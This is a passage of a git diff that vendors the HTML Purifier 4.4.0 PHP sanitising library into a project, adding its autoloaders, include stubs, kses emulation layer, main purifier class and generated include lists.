/** Retrieves a character from an open file */ + public function getChar() { + if (!$this->handle) $this->open('r'); + return $this->fs->fgetc($this->handle); + } + + /** Retrieves an $length bytes of data from an open data */ + public function read($length) { + if (!$this->handle) $this->open('r'); + return $this->fs->fread($this->handle, $length); + } + + /** Writes to an open file */ + public function put($string) { + if (!$this->handle) $this->open('a'); + return $this->fs->fwrite($this->handle, $string); + } + + /** Returns TRUE if the end of the file has been reached */ + public function eof() { + if (!$this->handle) return true; + return $this->fs->feof($this->handle); + } + + public function __destruct() { + if ($this->handle) $this->close(); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/extras/HTMLPurifierExtras.auto.php b/lib/htmlpurifier/extras/HTMLPurifierExtras.auto.php new file mode 100644 index 000000000..4016d8afd --- /dev/null +++ b/lib/htmlpurifier/extras/HTMLPurifierExtras.auto.php @@ -0,0 +1,11 @@ +<?php + +/** + * This is a stub include that automatically configures the include path. + */ + +set_include_path(dirname(__FILE__) . PATH_SEPARATOR . get_include_path() ); +require_once 'HTMLPurifierExtras.php'; +require_once 'HTMLPurifierExtras.autoload.php'; + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/extras/HTMLPurifierExtras.autoload.php b/lib/htmlpurifier/extras/HTMLPurifierExtras.autoload.php new file mode 100644 index 000000000..4285d62d1 --- /dev/null +++ b/lib/htmlpurifier/extras/HTMLPurifierExtras.autoload.php @@ -0,0 +1,25 @@ +<?php + +/** + * @file + * Convenience file that registers autoload handler for HTML Purifier. + * + * @warning + * This autoloader does not contain the compatibility code seen in + * HTMLPurifier_Bootstrap; the user is expected to make any necessary + * changes to use this library. + */ + +if (function_exists('spl_autoload_register')) { + spl_autoload_register(array('HTMLPurifierExtras', 'autoload')); + if (function_exists('__autoload')) { + // Be polite and ensure that userland autoload gets retained + spl_autoload_register('__autoload'); + } +} elseif (!function_exists('__autoload')) { + function __autoload($class) { + return HTMLPurifierExtras::autoload($class); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/extras/HTMLPurifierExtras.php b/lib/htmlpurifier/extras/HTMLPurifierExtras.php new file mode 100644 index 000000000..2a0c4d12d --- /dev/null +++ b/lib/htmlpurifier/extras/HTMLPurifierExtras.php @@ -0,0 +1,29 @@ +<?php + +/** + * Meta-class for HTML Purifier's extra class hierarchies, similar to + * HTMLPurifier_Bootstrap. + */ +class HTMLPurifierExtras +{ + + public static function autoload($class) { + $path = HTMLPurifierExtras::getPath($class); + if (!$path) return false; + require $path; + return true; + } + + public static function getPath($class) { + if ( + strncmp('FSTools', $class, 7) !== 0 && + strncmp('ConfigDoc', $class, 9) !== 0 + ) return false; + // Custom implementations can go here + // Standard implementation: + return str_replace('_', '/', $class) . '.php'; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/extras/README b/lib/htmlpurifier/extras/README new file mode 100644 index 000000000..4bfece79e --- /dev/null +++ b/lib/htmlpurifier/extras/README @@ -0,0 +1,32 @@ + +HTML Purifier Extras + The Method Behind The Madness! + +The extras/ folder in HTML Purifier contains--you guessed it--extra things +for HTML Purifier. Specifically, these are two extra libraries called +FSTools and ConfigSchema. They're extra for a reason: you don't need them +if you're using HTML Purifier for normal usage: filtering HTML. However, +if you're a developer, and would like to test HTML Purifier, or need to +use one of HTML Purifier's maintenance scripts, chances are they'll need +these libraries. Who knows: maybe you'll find them useful too! + +Here are the libraries: + + +FSTools +------- + +Short for File System Tools, this is a poor-man's object-oriented wrapper for +the filesystem. It currently consists of two classes: + +- FSTools: This is a singleton that contains a manner of useful functions + such as recursive glob, directory removal, etc, as well as the ability + to call arbitrary native PHP functions through it like $FS->fopen(...). + This makes it a lot simpler to mock these filesystem calls for unit testing. + +- FSTools_File: This object represents a single file, and has almost any + method imaginable one would need. + +Check the files themselves for more information. + + vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier.auto.php b/lib/htmlpurifier/library/HTMLPurifier.auto.php new file mode 100644 index 000000000..1960c399f --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier.auto.php @@ -0,0 +1,11 @@ +<?php + +/** + * This is a stub include that automatically configures the include path. + */ + +set_include_path(dirname(__FILE__) . PATH_SEPARATOR . get_include_path() ); +require_once 'HTMLPurifier/Bootstrap.php'; +require_once 'HTMLPurifier.autoload.php'; + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier.autoload.php b/lib/htmlpurifier/library/HTMLPurifier.autoload.php new file mode 100644 index 000000000..62da5b60d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier.autoload.php @@ -0,0 +1,26 @@ +<?php + +/** + * @file + * Convenience file that registers autoload handler for HTML Purifier. + * It also does some sanity checks. + */ + +if (function_exists('spl_autoload_register') && function_exists('spl_autoload_unregister')) { + // We need unregister for our pre-registering functionality + HTMLPurifier_Bootstrap::registerAutoload(); + if (function_exists('__autoload')) { + // Be polite and ensure that userland autoload gets retained + spl_autoload_register('__autoload'); + } +} elseif (!function_exists('__autoload')) { + function __autoload($class) { + return HTMLPurifier_Bootstrap::autoload($class); + } +} + +if (ini_get('zend.ze1_compatibility_mode')) { + trigger_error("HTML Purifier is not compatible with zend.ze1_compatibility_mode; please turn it off", E_USER_ERROR); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier.func.php b/lib/htmlpurifier/library/HTMLPurifier.func.php new file mode 100644 index 000000000..56a55b2fe --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier.func.php @@ -0,0 +1,23 @@ +<?php + +/** + * @file + * Defines a function wrapper for HTML Purifier for quick use. + * @note ''HTMLPurifier()'' is NOT the same as ''new HTMLPurifier()'' + */ + +/** + * Purify HTML. + * @param $html String HTML to purify + * @param $config Configuration to use, can be any value accepted by + * HTMLPurifier_Config::create() + */ +function HTMLPurifier($html, $config = null) { + static $purifier = false; + if (!$purifier) { + $purifier = new HTMLPurifier(); + } + return $purifier->purify($html, $config); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier.includes.php b/lib/htmlpurifier/library/HTMLPurifier.includes.php new file mode 100644 index 000000000..0ceff6a92 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier.includes.php @@ -0,0 +1,221 @@ +<?php + +/** + * @file + * This file was auto-generated by generate-includes.php and includes all of + * the core files required by HTML Purifier. Use this if performance is a + * primary concern and you are using an opcode cache. PLEASE DO NOT EDIT THIS + * FILE, changes will be overwritten the next time the script is run. + * + * @version 4.4.0 + * + * @warning + * You must *not* include any other HTML Purifier files before this file, + * because 'require' not 'require_once' is used. + * + * @warning + * This file requires that the include path contains the HTML Purifier + * library directory; this is not auto-set. + */ + +require 'HTMLPurifier.php'; +require 'HTMLPurifier/AttrCollections.php'; +require 'HTMLPurifier/AttrDef.php'; +require 'HTMLPurifier/AttrTransform.php'; +require 'HTMLPurifier/AttrTypes.php'; +require 'HTMLPurifier/AttrValidator.php'; +require 'HTMLPurifier/Bootstrap.php'; +require 'HTMLPurifier/Definition.php'; +require 'HTMLPurifier/CSSDefinition.php'; +require 'HTMLPurifier/ChildDef.php'; +require 'HTMLPurifier/Config.php'; +require 'HTMLPurifier/ConfigSchema.php'; +require 'HTMLPurifier/ContentSets.php'; +require 'HTMLPurifier/Context.php'; +require 'HTMLPurifier/DefinitionCache.php'; +require 'HTMLPurifier/DefinitionCacheFactory.php'; +require 'HTMLPurifier/Doctype.php'; +require 'HTMLPurifier/DoctypeRegistry.php'; +require 'HTMLPurifier/ElementDef.php'; +require 'HTMLPurifier/Encoder.php'; +require 'HTMLPurifier/EntityLookup.php'; +require 'HTMLPurifier/EntityParser.php'; +require 'HTMLPurifier/ErrorCollector.php'; +require 'HTMLPurifier/ErrorStruct.php'; +require 'HTMLPurifier/Exception.php'; +require 'HTMLPurifier/Filter.php'; +require 'HTMLPurifier/Generator.php'; +require 'HTMLPurifier/HTMLDefinition.php'; +require 'HTMLPurifier/HTMLModule.php'; +require 'HTMLPurifier/HTMLModuleManager.php'; +require 'HTMLPurifier/IDAccumulator.php'; +require 'HTMLPurifier/Injector.php'; +require 'HTMLPurifier/Language.php'; +require 'HTMLPurifier/LanguageFactory.php'; +require 'HTMLPurifier/Length.php'; +require 'HTMLPurifier/Lexer.php'; +require 'HTMLPurifier/PercentEncoder.php'; +require 'HTMLPurifier/PropertyList.php'; +require 'HTMLPurifier/PropertyListIterator.php'; +require 'HTMLPurifier/Strategy.php'; +require 'HTMLPurifier/StringHash.php'; +require 'HTMLPurifier/StringHashParser.php'; +require 'HTMLPurifier/TagTransform.php'; +require 'HTMLPurifier/Token.php'; +require 'HTMLPurifier/TokenFactory.php'; +require 'HTMLPurifier/URI.php'; +require 'HTMLPurifier/URIDefinition.php'; +require 'HTMLPurifier/URIFilter.php'; +require 'HTMLPurifier/URIParser.php'; +require 'HTMLPurifier/URIScheme.php'; +require 'HTMLPurifier/URISchemeRegistry.php'; +require 'HTMLPurifier/UnitConverter.php'; +require 'HTMLPurifier/VarParser.php'; +require 'HTMLPurifier/VarParserException.php'; +require 'HTMLPurifier/AttrDef/CSS.php'; +require 'HTMLPurifier/AttrDef/Clone.php'; +require 'HTMLPurifier/AttrDef/Enum.php'; +require 'HTMLPurifier/AttrDef/Integer.php'; +require 'HTMLPurifier/AttrDef/Lang.php'; +require 'HTMLPurifier/AttrDef/Switch.php'; +require 'HTMLPurifier/AttrDef/Text.php'; +require 'HTMLPurifier/AttrDef/URI.php'; +require 'HTMLPurifier/AttrDef/CSS/Number.php'; +require 'HTMLPurifier/AttrDef/CSS/AlphaValue.php'; +require 'HTMLPurifier/AttrDef/CSS/Background.php'; +require 'HTMLPurifier/AttrDef/CSS/BackgroundPosition.php'; +require 'HTMLPurifier/AttrDef/CSS/Border.php'; +require 'HTMLPurifier/AttrDef/CSS/Color.php'; +require 'HTMLPurifier/AttrDef/CSS/Composite.php'; +require 'HTMLPurifier/AttrDef/CSS/DenyElementDecorator.php'; +require 'HTMLPurifier/AttrDef/CSS/Filter.php'; +require 'HTMLPurifier/AttrDef/CSS/Font.php'; +require 'HTMLPurifier/AttrDef/CSS/FontFamily.php'; +require 'HTMLPurifier/AttrDef/CSS/Ident.php'; +require 'HTMLPurifier/AttrDef/CSS/ImportantDecorator.php'; +require 'HTMLPurifier/AttrDef/CSS/Length.php'; +require 'HTMLPurifier/AttrDef/CSS/ListStyle.php'; +require 'HTMLPurifier/AttrDef/CSS/Multiple.php'; +require 'HTMLPurifier/AttrDef/CSS/Percentage.php'; +require 'HTMLPurifier/AttrDef/CSS/TextDecoration.php'; +require 'HTMLPurifier/AttrDef/CSS/URI.php'; +require 'HTMLPurifier/AttrDef/HTML/Bool.php'; +require 'HTMLPurifier/AttrDef/HTML/Nmtokens.php'; +require 'HTMLPurifier/AttrDef/HTML/Class.php'; +require 'HTMLPurifier/AttrDef/HTML/Color.php'; +require 'HTMLPurifier/AttrDef/HTML/FrameTarget.php'; +require 'HTMLPurifier/AttrDef/HTML/ID.php'; +require 'HTMLPurifier/AttrDef/HTML/Pixels.php'; +require 'HTMLPurifier/AttrDef/HTML/Length.php'; +require 'HTMLPurifier/AttrDef/HTML/LinkTypes.php'; +require 'HTMLPurifier/AttrDef/HTML/MultiLength.php'; +require 'HTMLPurifier/AttrDef/URI/Email.php'; +require 'HTMLPurifier/AttrDef/URI/Host.php'; +require 'HTMLPurifier/AttrDef/URI/IPv4.php'; +require 'HTMLPurifier/AttrDef/URI/IPv6.php'; +require 'HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php'; +require 'HTMLPurifier/AttrTransform/Background.php'; +require 'HTMLPurifier/AttrTransform/BdoDir.php'; +require 'HTMLPurifier/AttrTransform/BgColor.php'; +require 'HTMLPurifier/AttrTransform/BoolToCSS.php'; +require 'HTMLPurifier/AttrTransform/Border.php'; +require 'HTMLPurifier/AttrTransform/EnumToCSS.php'; +require 'HTMLPurifier/AttrTransform/ImgRequired.php'; +require 'HTMLPurifier/AttrTransform/ImgSpace.php'; +require 'HTMLPurifier/AttrTransform/Input.php'; +require 'HTMLPurifier/AttrTransform/Lang.php'; +require 'HTMLPurifier/AttrTransform/Length.php'; +require 'HTMLPurifier/AttrTransform/Name.php'; +require 'HTMLPurifier/AttrTransform/NameSync.php'; +require 'HTMLPurifier/AttrTransform/Nofollow.php'; +require 'HTMLPurifier/AttrTransform/SafeEmbed.php'; +require 'HTMLPurifier/AttrTransform/SafeObject.php'; +require 'HTMLPurifier/AttrTransform/SafeParam.php'; +require 'HTMLPurifier/AttrTransform/ScriptRequired.php'; +require 'HTMLPurifier/AttrTransform/TargetBlank.php'; +require 'HTMLPurifier/AttrTransform/Textarea.php'; +require 'HTMLPurifier/ChildDef/Chameleon.php'; +require 'HTMLPurifier/ChildDef/Custom.php'; +require 'HTMLPurifier/ChildDef/Empty.php'; +require 'HTMLPurifier/ChildDef/List.php'; +require 'HTMLPurifier/ChildDef/Required.php'; +require 'HTMLPurifier/ChildDef/Optional.php'; +require 'HTMLPurifier/ChildDef/StrictBlockquote.php'; +require 'HTMLPurifier/ChildDef/Table.php'; +require 'HTMLPurifier/DefinitionCache/Decorator.php'; +require 'HTMLPurifier/DefinitionCache/Null.php'; +require 'HTMLPurifier/DefinitionCache/Serializer.php'; +require 'HTMLPurifier/DefinitionCache/Decorator/Cleanup.php'; +require 'HTMLPurifier/DefinitionCache/Decorator/Memory.php'; +require 'HTMLPurifier/HTMLModule/Bdo.php'; +require 'HTMLPurifier/HTMLModule/CommonAttributes.php'; +require 'HTMLPurifier/HTMLModule/Edit.php'; +require 'HTMLPurifier/HTMLModule/Forms.php'; +require 'HTMLPurifier/HTMLModule/Hypertext.php'; +require 'HTMLPurifier/HTMLModule/Iframe.php'; +require 'HTMLPurifier/HTMLModule/Image.php'; +require 'HTMLPurifier/HTMLModule/Legacy.php'; +require 'HTMLPurifier/HTMLModule/List.php'; +require 'HTMLPurifier/HTMLModule/Name.php'; +require 'HTMLPurifier/HTMLModule/Nofollow.php'; +require 'HTMLPurifier/HTMLModule/NonXMLCommonAttributes.php'; +require 'HTMLPurifier/HTMLModule/Object.php'; +require 'HTMLPurifier/HTMLModule/Presentation.php'; +require 'HTMLPurifier/HTMLModule/Proprietary.php'; +require 'HTMLPurifier/HTMLModule/Ruby.php'; +require 'HTMLPurifier/HTMLModule/SafeEmbed.php'; +require 'HTMLPurifier/HTMLModule/SafeObject.php'; +require 'HTMLPurifier/HTMLModule/Scripting.php'; +require 'HTMLPurifier/HTMLModule/StyleAttribute.php'; +require 'HTMLPurifier/HTMLModule/Tables.php'; +require 'HTMLPurifier/HTMLModule/Target.php'; +require 'HTMLPurifier/HTMLModule/TargetBlank.php'; +require 'HTMLPurifier/HTMLModule/Text.php'; +require 'HTMLPurifier/HTMLModule/Tidy.php'; +require 'HTMLPurifier/HTMLModule/XMLCommonAttributes.php'; +require 'HTMLPurifier/HTMLModule/Tidy/Name.php'; +require 'HTMLPurifier/HTMLModule/Tidy/Proprietary.php'; +require 'HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php'; +require 'HTMLPurifier/HTMLModule/Tidy/Strict.php'; +require 'HTMLPurifier/HTMLModule/Tidy/Transitional.php'; +require 'HTMLPurifier/HTMLModule/Tidy/XHTML.php'; +require 'HTMLPurifier/Injector/AutoParagraph.php'; +require 'HTMLPurifier/Injector/DisplayLinkURI.php'; +require 'HTMLPurifier/Injector/Linkify.php'; +require 'HTMLPurifier/Injector/PurifierLinkify.php'; +require 'HTMLPurifier/Injector/RemoveEmpty.php'; +require 'HTMLPurifier/Injector/RemoveSpansWithoutAttributes.php'; +require 'HTMLPurifier/Injector/SafeObject.php'; +require 'HTMLPurifier/Lexer/DOMLex.php'; +require 'HTMLPurifier/Lexer/DirectLex.php'; +require 'HTMLPurifier/Strategy/Composite.php'; +require 'HTMLPurifier/Strategy/Core.php'; +require 'HTMLPurifier/Strategy/FixNesting.php'; +require 'HTMLPurifier/Strategy/MakeWellFormed.php'; +require 'HTMLPurifier/Strategy/RemoveForeignElements.php'; +require 'HTMLPurifier/Strategy/ValidateAttributes.php'; +require 'HTMLPurifier/TagTransform/Font.php'; +require 'HTMLPurifier/TagTransform/Simple.php'; +require 'HTMLPurifier/Token/Comment.php'; +require 'HTMLPurifier/Token/Tag.php'; +require 'HTMLPurifier/Token/Empty.php'; +require 'HTMLPurifier/Token/End.php'; +require 'HTMLPurifier/Token/Start.php'; +require 'HTMLPurifier/Token/Text.php'; +require 'HTMLPurifier/URIFilter/DisableExternal.php'; +require 'HTMLPurifier/URIFilter/DisableExternalResources.php'; +require 'HTMLPurifier/URIFilter/DisableResources.php'; +require 'HTMLPurifier/URIFilter/HostBlacklist.php'; +require 'HTMLPurifier/URIFilter/MakeAbsolute.php'; +require 'HTMLPurifier/URIFilter/Munge.php'; +require 'HTMLPurifier/URIFilter/SafeIframe.php'; +require 'HTMLPurifier/URIScheme/data.php'; +require 'HTMLPurifier/URIScheme/file.php'; +require 'HTMLPurifier/URIScheme/ftp.php'; +require 'HTMLPurifier/URIScheme/http.php'; +require 'HTMLPurifier/URIScheme/https.php'; +require 'HTMLPurifier/URIScheme/mailto.php'; +require 'HTMLPurifier/URIScheme/news.php'; +require 'HTMLPurifier/URIScheme/nntp.php'; +require 'HTMLPurifier/VarParser/Flexible.php'; +require 'HTMLPurifier/VarParser/Native.php'; diff --git a/lib/htmlpurifier/library/HTMLPurifier.kses.php b/lib/htmlpurifier/library/HTMLPurifier.kses.php new file mode 100644 index 000000000..3143feb17 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier.kses.php @@ -0,0 +1,30 @@ +<?php + +/** + * @file + * Emulation layer for code that used kses(), substituting in HTML Purifier. + */ + +require_once dirname(__FILE__) . '/HTMLPurifier.auto.php'; + +function kses($string, $allowed_html, $allowed_protocols = null) { + $config = HTMLPurifier_Config::createDefault(); + $allowed_elements = array(); + $allowed_attributes = array(); + foreach ($allowed_html as $element => $attributes) { + $allowed_elements[$element] = true; + foreach ($attributes as $attribute => $x) { + $allowed_attributes["$element.$attribute"] = true; + } + } + $config->set('HTML.AllowedElements', $allowed_elements); + $config->set('HTML.AllowedAttributes', $allowed_attributes); + $allowed_schemes = array(); + if ($allowed_protocols !== null) { + $config->set('URI.AllowedSchemes', $allowed_protocols); + } + $purifier = new HTMLPurifier($config); + return $purifier->purify($string); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier.path.php b/lib/htmlpurifier/library/HTMLPurifier.path.php new file mode 100644 index 000000000..39b1b6531 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier.path.php @@ -0,0 +1,11 @@ +<?php + +/** + * @file + * Convenience stub file that adds HTML Purifier's library file to the path + * without any other side-effects. + */ + +set_include_path(dirname(__FILE__) . PATH_SEPARATOR . get_include_path() ); + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier.php b/lib/htmlpurifier/library/HTMLPurifier.php new file mode 100644 index 000000000..e599e1c0c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier.php @@ -0,0 +1,237 @@ +<?php + +/*! @mainpage + * + * HTML Purifier is an HTML filter that will take an arbitrary snippet of + * HTML and rigorously test, validate and filter it into a version that + * is safe for output onto webpages. It achieves this by: + * + * -# Lexing (parsing into tokens) the document, + * -# Executing various strategies on the tokens: + * -# Removing all elements not in the whitelist, + * -# Making the tokens well-formed, + * -# Fixing the nesting of the nodes, and + * -# Validating attributes of the nodes; and + * -# Generating HTML from the purified tokens. + * + * However, most users will only need to interface with the HTMLPurifier + * and HTMLPurifier_Config. + */ + +/* + HTML Purifier 4.4.0 - Standards Compliant HTML Filtering + Copyright (C) 2006-2008 Edward Z. Yang + + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Lesser General Public + License as published by the Free Software Foundation; either + version 2.1 of the License, or (at your option) any later version. + + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Lesser General Public License for more details. + + You should have received a copy of the GNU Lesser General Public + License along with this library; if not, write to the Free Software + Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + */ + +/** + * Facade that coordinates HTML Purifier's subsystems in order to purify HTML. + * + * @note There are several points in which configuration can be specified + * for HTML Purifier. The precedence of these (from lowest to + * highest) is as follows: + * -# Instance: new HTMLPurifier($config) + * -# Invocation: purify($html, $config) + * These configurations are entirely independent of each other and + * are *not* merged (this behavior may change in the future). + * + * @todo We need an easier way to inject strategies using the configuration + * object. + */ +class HTMLPurifier +{ + + /** Version of HTML Purifier */ + public $version = '4.4.0'; + + /** Constant with version of HTML Purifier */ + const VERSION = '4.4.0'; + + /** Global configuration object */ + public $config; + + /** Array of extra HTMLPurifier_Filter objects to run on HTML, for backwards compatibility */ + private $filters = array(); + + /** Single instance of HTML Purifier */ + private static $instance; + + protected $strategy, $generator; + + /** + * Resultant HTMLPurifier_Context of last run purification. Is an array + * of contexts if the last called method was purifyArray(). + */ + public $context; + + /** + * Initializes the purifier. + * @param $config Optional HTMLPurifier_Config object for all instances of + * the purifier, if omitted, a default configuration is + * supplied (which can be overridden on a per-use basis). + * The parameter can also be any type that + * HTMLPurifier_Config::create() supports. + */ + public function __construct($config = null) { + + $this->config = HTMLPurifier_Config::create($config); + + $this->strategy = new HTMLPurifier_Strategy_Core(); + + } + + /** + * Adds a filter to process the output. First come first serve + * @param $filter HTMLPurifier_Filter object + */ + public function addFilter($filter) { + trigger_error('HTMLPurifier->addFilter() is deprecated, use configuration directives in the Filter namespace or Filter.Custom', E_USER_WARNING); + $this->filters[] = $filter; + } + + /** + * Filters an HTML snippet/document to be XSS-free and standards-compliant. + * + * @param $html String of HTML to purify + * @param $config HTMLPurifier_Config object for this operation, if omitted, + * defaults to the config object specified during this + * object's construction. The parameter can also be any type + * that HTMLPurifier_Config::create() supports. + * @return Purified HTML + */ + public function purify($html, $config = null) { + + // :TODO: make the config merge in, instead of replace + $config = $config ? HTMLPurifier_Config::create($config) : $this->config; + + // implementation is partially environment dependant, partially + // configuration dependant + $lexer = HTMLPurifier_Lexer::create($config); + + $context = new HTMLPurifier_Context(); + + // setup HTML generator + $this->generator = new HTMLPurifier_Generator($config, $context); + $context->register('Generator', $this->generator); + + // set up global context variables + if ($config->get('Core.CollectErrors')) { + // may get moved out if other facilities use it + $language_factory = HTMLPurifier_LanguageFactory::instance(); + $language = $language_factory->create($config, $context); + $context->register('Locale', $language); + + $error_collector = new HTMLPurifier_ErrorCollector($context); + $context->register('ErrorCollector', $error_collector); + } + + // setup id_accumulator context, necessary due to the fact that + // AttrValidator can be called from many places + $id_accumulator = HTMLPurifier_IDAccumulator::build($config, $context); + $context->register('IDAccumulator', $id_accumulator); + + $html = HTMLPurifier_Encoder::convertToUTF8($html, $config, $context); + + // setup filters + $filter_flags = $config->getBatch('Filter'); + $custom_filters = $filter_flags['Custom']; + unset($filter_flags['Custom']); + $filters = array(); + foreach ($filter_flags as $filter => $flag) { + if (!$flag) continue; + if (strpos($filter, '.') !== false) continue; + $class = "HTMLPurifier_Filter_$filter"; + $filters[] = new $class; + } + foreach ($custom_filters as $filter) { + // maybe "HTMLPurifier_Filter_$filter", but be consistent with AutoFormat + $filters[] = $filter; + } + $filters = array_merge($filters, $this->filters); + // maybe prepare(), but later + + for ($i = 0, $filter_size = count($filters); $i < $filter_size; $i++) { + $html = $filters[$i]->preFilter($html, $config, $context); + } + + // purified HTML + $html = + $this->generator->generateFromTokens( + // list of tokens + $this->strategy->execute( + // list of un-purified tokens + $lexer->tokenizeHTML( + // un-purified HTML + $html, $config, $context + ), + $config, $context + ) + ); + + for ($i = $filter_size - 1; $i >= 0; $i--) { + $html = $filters[$i]->postFilter($html, $config, $context); + } + + $html = HTMLPurifier_Encoder::convertFromUTF8($html, $config, $context); + $this->context =& $context; + return $html; + } + + /** + * Filters an array of HTML snippets + * @param $config Optional HTMLPurifier_Config object for this operation. + * See HTMLPurifier::purify() for more details. + * @return Array of purified HTML + */ + public function purifyArray($array_of_html, $config = null) { + $context_array = array(); + foreach ($array_of_html as $key => $html) { + $array_of_html[$key] = $this->purify($html, $config); + $context_array[$key] = $this->context; + } + $this->context = $context_array; + return $array_of_html; + } + + /** + * Singleton for enforcing just one HTML Purifier in your system + * @param $prototype Optional prototype HTMLPurifier instance to + * overload singleton with, or HTMLPurifier_Config + * instance to configure the generated version with. + */ + public static function instance($prototype = null) { + if (!self::$instance || $prototype) { + if ($prototype instanceof HTMLPurifier) { + self::$instance = $prototype; + } elseif ($prototype) { + self::$instance = new HTMLPurifier($prototype); + } else { + self::$instance = new HTMLPurifier(); + } + } + return self::$instance; + } + + /** + * @note Backwards compatibility, see instance() + */ + public static function getInstance($prototype = null) { + return HTMLPurifier::instance($prototype); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier.safe-includes.php b/lib/htmlpurifier/library/HTMLPurifier.safe-includes.php new file mode 100644 index 000000000..d49b196c4 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier.safe-includes.php @@ -0,0 +1,215 @@ +<?php + +/** + * @file + * This file was auto-generated by generate-includes.php and includes all of + * the core files required by HTML Purifier. This is a convenience stub that + * includes all files using dirname(__FILE__) and require_once. PLEASE DO NOT + * EDIT THIS FILE, changes will be overwritten the next time the script is run. + * + * Changes to include_path are not necessary. + */ + +$__dir = dirname(__FILE__); + +require_once $__dir . '/HTMLPurifier.php'; +require_once $__dir . '/HTMLPurifier/AttrCollections.php'; +require_once $__dir . '/HTMLPurifier/AttrDef.php'; +require_once $__dir . '/HTMLPurifier/AttrTransform.php'; +require_once $__dir . '/HTMLPurifier/AttrTypes.php'; +require_once $__dir . '/HTMLPurifier/AttrValidator.php'; +require_once $__dir . '/HTMLPurifier/Bootstrap.php'; +require_once $__dir . '/HTMLPurifier/Definition.php'; +require_once $__dir . '/HTMLPurifier/CSSDefinition.php'; +require_once $__dir . '/HTMLPurifier/ChildDef.php'; +require_once $__dir . '/HTMLPurifier/Config.php'; +require_once $__dir . '/HTMLPurifier/ConfigSchema.php'; +require_once $__dir . '/HTMLPurifier/ContentSets.php'; +require_once $__dir . '/HTMLPurifier/Context.php'; +require_once $__dir . '/HTMLPurifier/DefinitionCache.php'; +require_once $__dir . '/HTMLPurifier/DefinitionCacheFactory.php'; +require_once $__dir . '/HTMLPurifier/Doctype.php'; +require_once $__dir . '/HTMLPurifier/DoctypeRegistry.php'; +require_once $__dir . '/HTMLPurifier/ElementDef.php'; +require_once $__dir . '/HTMLPurifier/Encoder.php'; +require_once $__dir . '/HTMLPurifier/EntityLookup.php'; +require_once $__dir . '/HTMLPurifier/EntityParser.php'; +require_once $__dir . '/HTMLPurifier/ErrorCollector.php'; +require_once $__dir . '/HTMLPurifier/ErrorStruct.php'; +require_once $__dir . '/HTMLPurifier/Exception.php'; +require_once $__dir . '/HTMLPurifier/Filter.php'; +require_once $__dir . '/HTMLPurifier/Generator.php'; +require_once $__dir . '/HTMLPurifier/HTMLDefinition.php'; +require_once $__dir . '/HTMLPurifier/HTMLModule.php'; +require_once $__dir . '/HTMLPurifier/HTMLModuleManager.php'; +require_once $__dir . '/HTMLPurifier/IDAccumulator.php'; +require_once $__dir . '/HTMLPurifier/Injector.php'; +require_once $__dir . '/HTMLPurifier/Language.php'; +require_once $__dir . '/HTMLPurifier/LanguageFactory.php'; +require_once $__dir . '/HTMLPurifier/Length.php'; +require_once $__dir . '/HTMLPurifier/Lexer.php'; +require_once $__dir . '/HTMLPurifier/PercentEncoder.php'; +require_once $__dir . '/HTMLPurifier/PropertyList.php'; +require_once $__dir . '/HTMLPurifier/PropertyListIterator.php'; +require_once $__dir . '/HTMLPurifier/Strategy.php'; +require_once $__dir . '/HTMLPurifier/StringHash.php'; +require_once $__dir . '/HTMLPurifier/StringHashParser.php'; +require_once $__dir . '/HTMLPurifier/TagTransform.php'; +require_once $__dir . '/HTMLPurifier/Token.php'; +require_once $__dir . '/HTMLPurifier/TokenFactory.php'; +require_once $__dir . '/HTMLPurifier/URI.php'; +require_once $__dir . '/HTMLPurifier/URIDefinition.php'; +require_once $__dir . '/HTMLPurifier/URIFilter.php'; +require_once $__dir . '/HTMLPurifier/URIParser.php'; +require_once $__dir . '/HTMLPurifier/URIScheme.php'; +require_once $__dir . '/HTMLPurifier/URISchemeRegistry.php'; +require_once $__dir . '/HTMLPurifier/UnitConverter.php'; +require_once $__dir . '/HTMLPurifier/VarParser.php'; +require_once $__dir . '/HTMLPurifier/VarParserException.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/Clone.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/Enum.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/Integer.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/Lang.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/Switch.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/Text.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/URI.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Number.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/AlphaValue.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Background.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/BackgroundPosition.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Border.php'; +require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Color.php'; +require_once $__dir . 